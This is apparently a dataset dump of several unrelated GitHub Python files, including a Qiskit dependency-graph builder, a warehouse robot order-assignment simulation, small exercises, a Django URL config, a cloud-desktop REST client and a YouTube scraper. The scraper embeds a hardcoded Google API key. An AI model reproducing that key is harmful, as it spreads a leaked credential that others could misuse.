QiskitGateToOperation(gate, flag_single)\n operation.qiskit_data = gate\n if operation == None:\n num_unidentified_gates += 1\n else:\n operations.append(operation)\n GenerateDependency(operations, q.size)\n DG = OperationToDependencyGraph(operations)\n DG.interaction_matrix = interaction_matrix\n return DG, num_unidentified_gates\n\ndef QiskitGateToOperation(Gate, flag_single=False):\n '''\n ATTENTION: The input gate should only be cx or single-qubit gates\n convert a Qiskit Gate object to OperationU\n only support CNOT and single qubit gates\n flag_single: whether we should convert single qubit gate\n '''\n\n '''old qiskit version'''\n# =============================================================================\n# if Gate.name == 'cx':\n# qargs = Gate.qargs\n# return OperationCNOT(qargs[0], qargs[1])\n# =============================================================================\n '''new qiskit version'''\n if Gate[0].name == 'cx':\n qargs = Gate[1]\n return OperationCNOT(qargs[0].index, qargs[1].index)\n else:\n if flag_single == True:\n '''convert single-qbuit gate'''\n qiskit_gate = Gate[0]\n u_matrix = Operator(qiskit_gate).data\n qargs = Gate[1]\n if len(qargs) == 1:\n return OperationSingle(qargs[0].index, u_matrix=u_matrix,name=Gate[0].name) \n return None\n\ndef GenerateDependency(operations, num_q):\n '''Generate Dependency to operations according to the order'''\n dic = {}\n for i in range(num_q):\n dic[i] = None\n \n for operation in operations:\n qubits = operation.involve_qubits\n for q in qubits:\n if isinstance(q, int): q = [int(q), int(q)]\n if dic[q[1]] == None:\n dic[q[1]] = operation\n else:\n dependent_operation = dic[q[1]]\n if not dependent_operation in operation.dependent_operations:\n operation.dependent_operations.append(dependent_operation)\n dic[q[1]] = operation\n\ndef OperationToDependencyGraph(operations):\n '''\n create dependency graph\n input:\n operations a list of all operations instances\n '''\n first_gates = [-1]*50 #a list in which each element is the node that takes the first place of qubits\n \n num_vertex = len(operations)\n DG = nx.DiGraph()\n num_q_log = 0\n DG.add_nodes_from(list(range(num_vertex)))\n for i in range(num_vertex):\n current_operation = operations[i]\n qubits = current_operation.InvolveQubitsList()\n for qubit in qubits:\n if first_gates[qubit] == -1: first_gates[qubit] = i\n if qubit + 1 > num_q_log: num_q_log = qubit + 1\n DG.add_node(i, operation = current_operation)\n if current_operation.dependent_operations != []:\n DG.add_node(i, root = False)\n for current_de in 
current_operation.dependent_operations:\n DG.add_edge(operations.index(current_de), i)\n else:\n DG.add_node(i, root = True)\n DG.first_gates = first_gates\n DG.num_q_log = num_q_log\n return DG\n\ndef FindExecutableNode(dependency_graph,\n executed_vertex=None,\n executable_vertex=None,\n removed_vertexes=None):\n '''\n WHEN executable_vertex = None:\n Use dependency graph to find the executable vertexes/nodes, i.e., nodes\n in current level\n return:\n executable_nodes: a list of nodes. If no executable node, return []\n WHEN both executed_vertex and executable_vertex != None:\n only update executed_vertex and executable_vertex according to newly\n executed gates (removed_vertexes)\n return:\n executable_vertex \n '''\n DG = dependency_graph\n if executable_vertex == None:\n degree = DG.in_degree\n executable_nodes = []\n for i in degree:\n if i[1] == 0:\n executable_nodes.append(i[0])\n else:\n executable_nodes = executable_vertex\n for removed_vertex in removed_vertexes:\n if not removed_vertex in executable_vertex: raise Exception('removed node is not executable')\n candidate_nodes = DG.successors(removed_vertex)\n executable_nodes.remove(removed_vertex)\n executed_vertex.append(removed_vertex)\n #DG.remove_node(removed_vertex)\n for node in candidate_nodes:\n flag_add = True\n '''check whether this node is executable'''\n for pre_node in DG.predecessors(node):\n if not pre_node in executed_vertex:\n flag_add = False\n break\n if flag_add == True: executable_nodes.append(node)\n return executable_nodes\n\ndef AddLevelNumToDG(DG):\n '''\n Add level number to DG, this number can be obtained via\n DG.nodes[node][lev_num]\n '''\n executable_vertex = FindExecutableNode(DG)\n removed_vertexes = []\n executed_vertex = []\n lev_num = 0\n while len(executable_vertex) !=0:\n for node in executable_vertex:\n DG.nodes[node]['lev_num'] = lev_num\n removed_vertexes = executable_vertex.copy()\n executable_vertex = FindExecutableNode(DG,\n executed_vertex,\n executable_vertex,\n removed_vertexes)\n lev_num += 1\n \n\nif __name__ == '__main__':\n QASM_file = 'test3.qasm'\n path = 'C:/ProgramData/Anaconda3/Lib/site-packages/circuittransform/inputs/QASM example/'\n cir, res = CreateDGfromQASMfile(QASM_file, path, flag_single=True)\n DG, _ = res\n AddLevelNumToDG(DG)\n nx.draw(DG, with_labels=True)\n from cir_split import SplitDG\n res = SplitDG(DG,\n max_cut_cx=1,\n ini_part_A_qubits=[0, 1],\n ini_part_B_qubits=[2, 3, 4])\n print(res)","repo_name":"sanjinsanbai/EConTDD","sub_path":"cir_input/circuit_DG.py","file_name":"circuit_DG.py","file_ext":"py","file_size_in_byte":8333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23670398157","text":"from enum import Enum\nfrom numpy import sqrt\nfrom statistics import mean\n\n\nimport numpy\nimport yaml\nimport random\n\nfrom agent import Agent, Agent_State\nfrom order import Order, Order_State\n\n\nclass PickupStation():\n def __init__(self, coordinate):\n self.coordinate = coordinate\n\n def getCoordinate(self):\n return self.coordinate\n\n\nclass DeliveryStation():\n def __init__(self, coordinate):\n self.coordinate = coordinate\n\n def getCoordinate(self):\n return self.coordinate\n\n\nclass WareHouse_Env():\n\n def __init__(self, input_config_file, render=True):\n \"\"\"\n Creates a grid world of a warehouse, where multiples agents are supposed to collect items from pickup station\n and bring them to the delivery station. 
The Warehouse contains also obstacles\n\n :param input_config_file: yaml file that contains the word configuration\n \"\"\"\n # Load experiment parameters from the input.yaml file\n params = read_config_file(input_config_file)\n\n # Prepare for save the history to output.yaml file\n self.output = {\"schedule\": None}\n\n # Set the world grid\n self.dimensions = params[\"map\"][\"dimensions\"]\n self.map = numpy.zeros(self.dimensions, dtype=object)\n\n # Add pickupStation to list deliveryStation to the map\n self.pickupStations = []\n for pickupStation in list(params[\"map\"][\"pickupStation\"]):\n self.pickupStations.append(PickupStation(coordinate=pickupStation))\n\n # Add deliveryStation to list\n self.deliveryStation = DeliveryStation(coordinate=tuple(params[\"map\"][\"deliveryStation\"][0]))\n\n # Add obstacles to the map\n self.obstacles = []\n for obs in params[\"map\"][\"obstacles\"]:\n self.obstacles.append(obs)\n\n # Create agents\n self.agents = []\n for agentId, d in enumerate(params[\"agents\"]):\n agent = Agent(d[\"name\"], self.map, self.deliveryStation, position=tuple(d[\"start\"]))\n self.agents.append(agent)\n\n # Create Orders\n self.order_list = []\n # self.order_stats = []\n for i in range(len(params[\"order\"][\"orders_\"])): # Create as many orders as total_orders\n id_code = params[\"order\"][\"orders_\"][i][\"id_code\"]\n quantity = params[\"order\"][\"orders_\"][i][\"requested_quantities\"]\n timestep_begin = params[\"order\"][\"orders_\"][i][\"timestep\"]\n PickUP = params[\"order\"][\"orders_\"][i][\"pickupStation\"]\n order = Order(self.deliveryStation.getCoordinate(), PickUP[0], quantity, timestep_begin, id_code)\n print(\"ORDER\", order.id_code, order.pickupStation, \"quantity:\", order.requested_quantities, \"time_begin:\",\n order.timestep_begin)\n self.order_list.append(order)\n # self.order_stats.append(order)\n\n # Check if all agents are done\n self._done = False\n\n # Render in Terminal option\n self.renderMap(0)\n\n def step(self, timestep):\n\n # Assign orders to agents\n '''\n CNP: Orders are distributed here. 
Agent bid with distance to pickup station of order.\n '''\n for order in self.order_list:\n if order.get_order_state() == 0 and order.getTimestep_begin() <= timestep:\n winner = None\n winnerDistance = None\n for agent in self.agents:\n if agent.getState() == Agent_State._Done: # Agent is _Done\n distance = self.callForProposal(agent, order)\n if winner == None or distance < winnerDistance:\n winnerDistance = distance\n winner = agent\n if winner != None:\n winner.setOrder(order, timestep, winner.getId())\n for i in range(len(self.order_list)):\n if order.getOrderId() == self.order_list[i].id_code:\n self.order_list[i].agent_assigned = winner.getId()\n\n '''\n eCNP: All agents get orders proposed, also agent who already working on an order.\n '''\n for order in self.order_list: #to turn off eCMP comment it out\n if order.get_order_state() == 1 and order.getTimestep_begin() <= timestep:\n winner = None\n winnerDistance = None\n for agent in self.agents:\n if agent.getState() == Agent_State._Done or agent.getState() == Agent_State._Picking: # Agent is _Done\n distance = self.callForProposal(agent, order)\n if winner == None or distance < winnerDistance:\n winnerDistance = distance\n winner = agent\n if winner != None:\n winner.setOrder(order, timestep, winner.getId())\n for i in range(len(self.order_list)):\n if order.getOrderId() == self.order_list[i].id_code:\n self.order_list[i].agent_assigned = winner.getId()\n\n # Let agents make their moves\n for agent in self.agents:\n self.map[agent.getPosition()[0], agent.getPosition()[1]] = 0 # Reset position of agent\n agent.makesMove(timestep, self.map)\n self.renderMap(timestep)\n\n # Print for console\n self.renderMap(timestep, False)\n\n # Save history\n self.save_stepHistory()\n\n def callForProposal(self, agent, order):\n \"\"\"\n Return distance of agent to orders pickupstation\n TODO doesnt consider obstacles, solver should be used here.\n \"\"\"\n return sqrt((order.getPickupStation()[0] - agent.getPosition()[0]) ** 2 + (\n order.getPickupStation()[1] - agent.getPosition()[1]) ** 2)\n\n # Render stations\n def renderMap(self, timestep, printBool=False):\n \"\"\"\n Renders the map completely new everytime.\n \"\"\"\n\n # Render everything to zero\n self.map = numpy.zeros(self.dimensions, dtype=object)\n\n # Add obstacles\n for obs in self.obstacles:\n self.map[obs] = \"*\"\n\n # Add delivery station\n self.map[self.deliveryStation.getCoordinate()] = \"D\"\n\n # Add pickup stations\n for pickupStation in self.pickupStations:\n self.map[pickupStation.getCoordinate()] = \"P\"\n\n # Add agents\n for agent in self.agents:\n if self.is_in_P_station(agent):\n self.map[agent.getPosition()] = f\"P@A{agent.agentId}\"\n elif agent.getPosition == self.deliveryStation.getCoordinate():\n self.map[agent.getPosition()] = f\"D@A{agent.agentId}\"\n else:\n self.map[agent.getPosition()] = f\"A{agent.getId()}\"\n\n if printBool:\n print(\"#################\", timestep)\n print(self.map)\n\n def is_in_P_station(self, agent):\n for pickupStation in self.pickupStations:\n if pickupStation.getCoordinate() == agent.getPosition():\n return True\n return False\n\n def allOrdersDone(self):\n \"\"\"\n Return true if all orders are delivered\n \"\"\"\n for order in self.order_list:\n if order.get_order_state() != 3:\n return False\n return True\n\n def save_stepHistory(self):\n data = {}\n for agent in self.agents:\n data[agent.getId()] = agent.getStepsHistory()\n self.output[\"schedule\"] = data\n\n # Update env state to done if all agents are _Done and no more 
orders\n def everythingDone(self):\n \"\"\"\n End simulation if all orders had been delivered.\n \"\"\"\n if self.order_list != []:\n return False\n for agent in self.agents:\n # print(\"agent.state != Agent_State._Done\", agent.state, Agent_State._Done, agent.state != Agent_State._Done)\n if agent.state != Agent_State._Done:\n return False\n return True\n\n\ndef read_config_file(config_file):\n with open(config_file, 'r') as input_file:\n try:\n params = yaml.load(input_file, Loader=yaml.FullLoader)\n except yaml.YAMLError as exc:\n print(exc)\n return params\n\n\ndef write_output_file(output_file, output):\n with open(output_file, 'w') as output_yaml:\n yaml.safe_dump(output, output_yaml)\n\n\nif __name__ == \"__main__\":\n input_file = \"./input.yaml\"\n env = WareHouse_Env(input_config_file=input_file)\n timestep = 0\n while True:\n env.step(timestep)\n\n timestep += 1\n\n if timestep > 10000000 or env.allOrdersDone():\n print(\"Done with\", timestep, \"timesteps.\")\n break\n\n # Print results\n totallist = []\n deliverytimelist = []\n waitingtimelist = []\n for j in range(len(env.order_list)):\n E = env.order_list[j]\n print(\"Order;\", E.id_code, \"; agent\", E.agent_assigned, \"; agent pos:\", E.agent_pos, \"; pickup:\",\n E.pickupStation, \"; d_required:\", round(E.distance, 1), \"; t_begin:\", E.timestep_begin, \"; t_pick:\",\n E.timestep_pick, \"; t_end:\", E.timestep_end, \"; t_diff:\", (E.timestep_pick - E.timestep_begin),\n \"; d_performed:\", (E.timestep_end - E.timestep_pick), \"; loss:\",\n round((E.timestep_end - E.timestep_pick - E.distance), 2))\n\n # print(\"Order\", E.id_code, \" agent\", E.agent_assigned)\n # print(\"agent pos:\", E.agent_pos, \"pickup: \", E.pickupStation, \"distance: \", round( sqrt((E.agent_pos[0] - E.pickupStation[0])**2 + (E.agent_pos[1] - E.pickupStation[1])**2), 1))\n # print(\"quantity:\", E.requested_quantities, \" t_begin:\", E.timestep_begin)\n # print(\"t_begin:\", E.timestep_begin, \"t_pick:\", E.timestep_pick, \" t_end: \", E.timestep_end)\n # print(\"d_performed:\", (E.timestep_end - E.timestep_pick))\n # print(\"loss: \", round((E.timestep_end - E.timestep_pick - E.distance), 2))\n totallist.append(E.timestep_end - E.timestep_begin)\n waitingtimelist.append(E.timestep_pick - E.timestep_begin)\n deliverytimelist.append(E.timestep_end - E.timestep_pick)\n\n orderchangelist = []\n for agent in env.agents:\n i = 0\n for first, second in zip(agent.order_log, agent.order_log[1 : ] + agent.order_log[ : 1]):\n if (first != second):\n i = i + 1\n\n print(\"agent:\", agent.agentId, \", number of order-changes:\", agent.order_switchcount, ', unequal changes: ', i)\n orderchangelist.append(i)\n\n print('average order switches ' + str(mean(orderchangelist)))\n write_output_file(\"./output.yaml\", env.output)\n print(\" avg delivery: \" + str(mean(deliverytimelist)) + \" avg total: \" + str(\n mean(totallist)) + \" avg waitinglist: \" + str(mean(waitingtimelist)))\n filehandler = open('averagedeliverytimenow.txt', 'w')\n filehandler.write(str(mean(totallist)))\n","repo_name":"AmroBayoumy/Optimizing-Order-Delivery-in-a-multi-agent-warehouse-robot-system-using-Contract-Net-Protocol","sub_path":"environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":10954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"6606127608","text":"import sys\nimport random\nimport string\n\nTEST_COUNT = 8\ndef get_random_string():\n WORDS = (\" cat\", \" jumble\", \" easy\", \" 
difficult\", \" answer\", \" xylophone\")\n length = random.randint(0, 1000)\n random_list = [ random.choice(WORDS) for _ in range(length) ]\n return \"\".join(random_list)\n'''\ndef get_random_string():\n length = random.randint(0, 16)\n random_list = [ random.choice(string.ascii_letters) for _ in range(length) ]\n return \"\".join(random_list)\n'''\ndef main():\n if len(sys.argv) != 2:\n print(f\"Usage: {sys.argv[0]} \")\n sys.exit(1)\n\n test_dir = sys.argv[1]\n\n lines = [0]\n lines.extend([ 10 ** i for i in range(TEST_COUNT) ])\n\n for enum, test_count in enumerate(range(1, TEST_COUNT+1)):\n test = []\n\n line_count = lines[enum]\n for _ in range(line_count):\n value = get_random_string()\n test.append(value)\n\n test_name = \"{}/{:02d}\".format(test_dir, test_count)\n with open(f'{test_name}.t', 'w') as ftest:\n for value in test:\n ftest.write(f'{value}\\n')\nmain()","repo_name":"IvaMarin/Discrete-Analysis","sub_path":"da_lab4/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24781209511","text":"# This is how you print the statement\r\nprint('Hello World')\r\n\r\n\"\"\"\r\nThis program is teaching you:\r\n1. How to add comments?\r\n2. How to print statement?\r\n3. How to declare variables?\r\n\"\"\"\r\n\r\na = input(\"Enter first number \")\r\nb = input(\"Enter second number \")\r\nc = a + b\r\nprint(c)\r\n","repo_name":"codestellar/learn-python","sub_path":"hello-world/hello-world.py","file_name":"hello-world.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33822576455","text":"###Titulo: Formação de uma terceira string\n###Função: Este programa lê duas strings e gera uma terceira string com as letras comuns a duas primeiras strings\n###Autor: Valmor Mantelli Jr.\n###Data: 07/01/2019\n###Versão: 0.0.1\n\n### Declaração de variáve \n\nf = \"\"\n\ns= \"\"\n\nt = \"\"\n\np = \"\"\n\n### Atribuição de valor \n\nf = \"AAACTBF\"\n\ns = \"CBT\"\n\n### Processamento\n\nfor p in f:\n\tif p in f and p in s: \n\t\n\t\tt += p\n\n### Saída\n\nif len (t) == 0:\n\tprint (\"Não existem letras comuns nas duas listas\")\nelse:\t\n\tprint (\"As letras comuns entre as variáveis %s e %s são %s\" % (f, s, t))\n\n\n\n","repo_name":"profnssorg/valmorMantelli1","sub_path":"exer702.py","file_name":"exer702.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71553574561","text":"from googleapiclient.discovery import build\r\nimport pandas as pd\r\n\r\nraw_data = {'title': [], 'channelTitle': [], 'tags': []}\r\ndf_marks = pd.DataFrame(raw_data)\r\n\r\napi_key = 'AIzaSyBJl7cgojKMu0-YDHJW6OWVbjwXWrxaQ7E'\r\n\r\nyoutube = build('youtube', 'v3', developerKey=api_key)\r\n\r\ndef getAllVideoData(channelId):\r\n\tglobal df_marks\r\n\r\n\tvid_ids = []\r\n\r\n\tch_request = youtube.channels().list(\r\n\t\tpart='snippet, contentDetails, statistics',\r\n\t\tid=channelId\r\n\t)\r\n\r\n\tch_response = ch_request.execute()\r\n\r\n\tfor item in ch_response['items']:\r\n\t\tmc_playlist_id = item['contentDetails']['relatedPlaylists']['uploads']\r\n\r\n\tnextPageToken = None\r\n\tpl_request = youtube.playlistItems().list(\r\n\t\tpart='contentDetails',\r\n\t\tplaylistId=mc_playlist_id,\r\n\t\tmaxResults=15,\r\n\t\tpageToken=nextPageToken\r\n\t)\r\n\r\n\tpl_response = 
pl_request.execute()\r\n\r\n\tfor item in pl_response['items']:\r\n\t\tvid_ids.append(item['contentDetails']['videoId'])\r\n\r\n\tvid_request = youtube.videos().list(\r\n\t\tpart=\"statistics, contentDetails, snippet\",\r\n\t\tid=','.join(vid_ids)\r\n\t)\r\n\r\n\tvid_response = vid_request.execute()\r\n\r\n\tfor item in vid_response['items']:\r\n\t\ttry:\r\n\t\t\tnew_row = {'title':item['snippet']['title'], 'channelTitle':item['snippet']['channelTitle'], 'tags':item['snippet']['tags']}\r\n\t\texcept:\r\n\t\t\tnew_row = {'title':item['snippet']['title'], 'channelTitle':item['snippet']['channelTitle'], 'tags':[]}\r\n\t\tdf_marks = df_marks.append(new_row, ignore_index=True)\r\n\r\ngetAllVideoData('UCe8K2OOoTmpm2u-1ec0fp0Q') # AprilSR\r\ngetAllVideoData('UC9HnCqLidC6nLktdUx-WXvA') # TheeSizzler\r\ngetAllVideoData('UCtNlOvqfBe8Rue4d7gXj9sQ') # Crafterdark\r\ngetAllVideoData('UCl05AQeLaOSjklP8SWpCdgg') # Four\r\ngetAllVideoData('UCpkC3VyoQK1zfwciiIYlvfw') # SpeedNintendo\r\ngetAllVideoData('UCqMazUQN-db8TmxnrZEA5KA') # k\r\ngetAllVideoData('UCTbC5qI5iZa0Q-F4LPla21Q') # Boscarvidios\r\ngetAllVideoData('UCcHyxtttXVEp-VaBtKp4wjw') # KaptainWutax\r\ngetAllVideoData('UC3AeCFbgCmdSPnQPJduDX3w') # Willz\r\ngetAllVideoData('UCv071F-VKI1V_UVVXiuyT-g') # randomidiot13\r\ngetAllVideoData('UCuu-Bu1hnwqq0xaK7pZ4OKw') # DKEN\r\ngetAllVideoData('UCSqDqnoPqg2VRUs8Jb7OvHw') # Renderedblue\r\ngetAllVideoData('UCsntFKaMT0NrGxjtpacC1cg') # pistacium\r\ngetAllVideoData('UCUOXKi6Byi57z0iob0bvNwA') # Cubing_Cinematics\r\ngetAllVideoData('UCh-nlS-qOHPXkDYYS1e5hEw') # MrMangoHands\r\n\r\ndf_marks.to_csv(r'D:/MinecraftYoutubeVideoData.csv')\r\n","repo_name":"jsnouffer/neo4j_db_project","sub_path":"src/youtube/MinecraftYoutubeVideoDataScraping.py","file_name":"MinecraftYoutubeVideoDataScraping.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27096645772","text":"RANK = 0\nCOUNTRY = 1\nELO = 2\nBYEAR = 3\n\n\ndef open_file(file_name):\n try:\n return open(file_name, \"r\")\n except FileNotFoundError:\n return None\n\ndef make_player_dict(file_obj):\n players_dict = {}\n for line in file_obj:\n line = line.strip().split(\"; \") # Split each element,\n player_ln, player_fn = line.pop(1).strip(\"\").split(\", \") # remove the players name from the list and save it as first name and last name \n players_dict[(player_fn + \" \" + player_ln)] = line # add to the dictionary the players along with their stats [Rank, country, elo, birth year]\n return players_dict\n\ndef make_dict_countries(players_dict):\n countries_dict = {}\n for player, stats in players_dict.items(): # Player: [stats]\n if stats[COUNTRY] in countries_dict: # If there is a player already from this country in this dict, add the new player\n countries_dict[stats[COUNTRY]].append(player)\n else: # Else add the country assigned with this player\n countries_dict[stats[COUNTRY]] = [player]\n return countries_dict\n\ndef print_sorted(dict_countries, players_dict):\n for country, players in sorted(dict_countries.items()):\n print(\"{} ({}) ({:.1f}):\".format(country, len(players), get_average_elo(players, players_dict))) # len(players) = the amount of players from that certain country, also get the average elo from that country\n for player in players:\n print(\"{:>40}{:>10d}\".format(player, int(players_dict[player][ELO]))) # print players and elo from a certain country\n\ndef get_average_elo(player_list, players_dict):\n ''' A Function that returns average elo 
from a certain list of players '''\n elo_sum = 0\n for player in player_list:\n elo_sum += int(players_dict[player][ELO]) # Get elo sum\n return (elo_sum/len(player_list)) # Retrun total sum divided by total amount of players in list\n\ndef main():\n file_name = input(\"Enter filename: Players by country:\\n\")\n print(\"-------------------\")\n file_obj = open_file(file_name)\n if file_obj: # If it is not empty\n players_dict = make_player_dict(file_obj)\n country_dict = make_dict_countries(players_dict)\n print_sorted(country_dict, players_dict)\n\nmain()","repo_name":"DongusJr/Verkefni_HR_2019_Haust","sub_path":"Assignments/Assignment_16/top_100_chess_part_1.py","file_name":"top_100_chess_part_1.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71894688481","text":"from django.urls import path\nfrom basic_app import views\n\n\n\n#TEMPLAT TAGGING: equal to application name\napp_name='basic_app'\n\nurlpatterns=[\n path('relative/',views.relative,name='relative'),\n\n # the url for above should be:http://127.0.0.1:8000/basic_app/relative/\n path('other/',views.other,name='other')\n\n]\n","repo_name":"bingyang-hu/Full-Stack-Web-Developer","sub_path":"learning_template/basic_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25499635875","text":"\nimport requests\nimport json\n\nclass cloudDesktopWrapper():\n def __init__(self):\n self.sessionID = ''\n self.user_id = ''\n self.user_password = ''\n self.host_ip = ''\n self.host_port = 80\n\n self.login_url = \"clc/api/1.0/user_login\"\n self.list_vm = \"clc/api/1.0/list_myvds\"\n self.create_url = \"clc/api/1.0/rvd/create\"\n self.start_url = \"clc/api/1.0/rvd/start\"\n self.prepare_url = \"clc/api/1.0/rvd/prepare\"\n self.progress_url = \"clc/api/1.0/rvd/getprogress\"\n self.run_url = \"clc/api/1.0/rvd/run\"\n self.stop_url = \"clc/api/1.0/rvd/stop\"\n self.vmstatus_url = \"clc/api/1.0/rvd/getvmstatus\"\n self.remove_task_url = \"clc/api/1.0/tasks/delete\"\n self.rdp_url = \"clc/api/1.0/rvd/get_rdp_url\"\n self.del_vm_url = \"clc/api/1.0/tasks/delete\"\n\n def setHost(self, ip, port=80):\n self.host_ip = ip\n self.host_port = port\n\n def setUser(self, user_id, user_password):\n self.user_id = user_id\n self.user_password = user_password\n\n def logon(self):\n url = 'http://%s:%s/%s' % (self.host_ip, self.host_port, self.login_url)\n payload = {\n 'email' : self.user_id,\n 'password' : self.user_password,\n }\n\n r = requests.post(url, data=payload)\n result = json.loads(r.content)\n\n if result['status'] == 'SUCCESS':\n self.sessionID = result['sid']\n return True\n else:\n return False\n\n # if sucess, return as belwo\n # {\n # 'Result' : 'OK',\n # 'data' : list of vms\n # }\n #\n # each vm in list looks like below:\n # {\n # 'ecid' : 'image id',\n # 'name' : 'image name',\n # 'ostype' : 'image os type',\n # 'desc' : 'image description',\n # 'tid' : 'transaction id',\n # 'phase' : 'transaction phase',\n # 'state' : 'transaction state',\n # 'mgr_url' : 'RDP access ip:port'\n # 'id' : 'index in list'\n # }\n #\n # if error, return as below\n # {\n # 'Result' : 'Failed',\n # 'error' : 'error message'\n # }\n def getVDList(self):\n url = 'http://%s:%s/%s' % (self.host_ip, self.host_port, self.list_vm)\n payload = {\n 'user': self.user_id,\n 'sid': self.sessionID,\n }\n\n r = requests.post(url, 
data=payload)\n result = json.loads(r.content)\n return result\n\n ###########################################################\n ##\n ## return :\n ## sucess : ['Result': 'OK', 'tid' : tid]\n ## failed : ['Result': 'FAIL', 'error' : error msg]\n ##\n ###########################################################\n def _create_tvd(self, vmdata):\n url = 'http://%s:%s/%s/%s' % (self.host_ip, self.host_port, self.create_url, vmdata['ecid'])\n payload = {\n 'sid': self.sessionID,\n }\n r = requests.post(url, data=payload)\n result = json.loads(r.content)\n return result\n\n def _parseTID(self, tid):\n _tmp = tid.split(':')\n return _tmp[0], _tmp[1], _tmp[2]\n\n ###########################################################\n ##\n ## return :\n ## sucess : ['Result': 'OK', 'tid' : tid]\n ## failed : ['Result': 'FAIL', 'error' : error msg]\n ##\n ###########################################################\n def _start_tvd(self, vmdata):\n tid = vmdata['tid']\n srcid, dstid, insid = self._parseTID(tid)\n\n url = 'http://%s:%s/%s/%s/%s/%s' % (self.host_ip, self.host_port, self.start_url, srcid, dstid, insid)\n payload = {\n 'sid': self.sessionID,\n }\n r = requests.post(url, data=payload)\n result = json.loads(r.content)\n return result\n\n def startVM(self, vmdata):\n if vmdata['tid'] == '':\n return self._create_tvd(vmdata)\n else:\n return self._start_tvd(vmdata)\n\n ###########################################################\n ##\n ## return :\n ## sucess : ['Result': 'OK', 'tid' : tid]\n ##\n ###########################################################\n def stopVM(self, vmdata):\n tid = vmdata['tid']\n srcid, dstid, insid = self._parseTID(tid)\n\n url = 'http://%s:%s/%s/%s/%s/%s' % (self.host_ip, self.host_port, self.stop_url, srcid, dstid, insid)\n payload = {\n 'sid': self.sessionID,\n }\n r = requests.post(url, data=payload)\n result = json.loads(r.content)\n return result\n\n\n ###########################################################\n ##\n ## return :\n ## sucess : ['Result': 'OK', 'tid' : tid]\n ## failed : ['Result': 'FAIL', 'error' : error msg]\n ##\n ###########################################################\n def prepareVM(self, vmdata):\n tid = vmdata['tid']\n srcid, dstid, insid = self._parseTID(tid)\n\n url = 'http://%s:%s/%s/%s/%s/%s' % (self.host_ip, self.host_port, self.prepare_url, srcid, dstid, insid)\n payload = {\n 'sid': self.sessionID,\n }\n r = requests.post(url, data=payload)\n result = json.loads(r.content)\n return result\n\n ###########################################################\n ##\n ## return = {\n ## 'type': 'taskstatus',\n ## 'phase': \"preparing\",\n ## 'state': 'downloading',\n ## 'progress': 0,\n ## 'tid': tid,\n ## 'prompt': '',\n ## 'errormsg': '',\n ## 'failed' : 0\n ## }\n ##\n ###########################################################\n def getPrepareProgress(self, vmdata):\n tid = vmdata['tid']\n srcid, dstid, insid = self._parseTID(tid)\n\n url = 'http://%s:%s/%s/%s/%s/%s' % (self.host_ip, self.host_port, self.progress_url, srcid, dstid, insid)\n r = requests.post(url)\n result = json.loads(r.content)\n return result\n\n ###########################################################\n ##\n ## return :\n ## sucess : ['Result': 'OK', 'tid' : tid]\n ##\n ###########################################################\n def runVM(self, vmdata):\n tid = vmdata['tid']\n srcid, dstid, insid = self._parseTID(tid)\n\n url = 'http://%s:%s/%s/%s/%s/%s' % (self.host_ip, self.host_port, self.run_url, srcid, dstid, insid)\n payload = {\n 'sid': self.sessionID,\n }\n r 
= requests.post(url, data=payload)\n result = json.loads(r.content)\n return result\n\n ###########################################################\n ##\n ## return = {\n ## 'type' : 'taskstatus',\n ## 'phase' : \"editing\",\n ## 'state' : 'stopped', 'booting', 'running' ,\n ## 'tid' : _tid,\n ## 'failed' : 0\n ## }\n ##\n ###########################################################\n def getVMStatus(self, vmdata):\n tid = vmdata['tid']\n srcid, dstid, insid = self._parseTID(tid)\n\n url = 'http://%s:%s/%s/%s/%s/%s' % (self.host_ip, self.host_port, self.vmstatus_url, srcid, dstid, insid)\n r = requests.post(url)\n result = json.loads(r.content)\n return result\n\n ###########################################################\n ##\n ## return :\n ## sucess : ['Result': 'OK', 'mgr_url' : rdp url]\n ##\n ###########################################################\n def getRDPUrl(self, vmdata):\n tid = vmdata['tid']\n srcid, dstid, insid = self._parseTID(tid)\n\n url = 'http://%s:%s/%s/%s/%s/%s' % (self.host_ip, self.host_port, self.rdp_url, srcid, dstid, insid)\n payload = {\n 'sid': self.sessionID,\n }\n r = requests.post(url, data=payload)\n result = (r.content)\n return json.loads(result)\n\n def delet_vm(self, vmdata):\n tid = vmdata['tid']\n\n url = 'http://%s:%s/%s/%s/%s/%s' % (self.host_ip, self.host_port, self.del_vm_url)\n payload = {\n 'tid': tid,\n }\n r = requests.post(url, data=payload)\n result = (r.content)\n return json.loads(result)\n\n def errorHandle(self, vmdata):\n self.delet_vm(vmdata)","repo_name":"liuyong240/eduCloud","sub_path":"webconfig/sdk/cloud-desktop/python/client_sdk.py","file_name":"client_sdk.py","file_ext":"py","file_size_in_byte":8369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18263592308","text":"import pytest\n\nfrom santa_helpers.neighbors import neighbors\n\nEXAMPLES_PARSE_GRID_TO_DICT = (\n ((1, 1), 4, None, None, {(0, 1), (1, 0), (2, 1), (1, 2)}),\n ((0, 0), 4, (0, 0), None, {(0, 1), (1, 0)}),\n ((0, 0), 4, (0, 0), (0, 0), set()),\n ((0, 0), 8, None, None, {\n (-1, -1), (0, -1), (1, -1),\n (-1, 0), (1, 0),\n (-1, 1), (0, 1), (1, 1),\n }),\n)\n\n\n@pytest.mark.parametrize(\n 'p,n,p_min,p_max,expected',\n EXAMPLES_PARSE_GRID_TO_DICT\n)\ndef 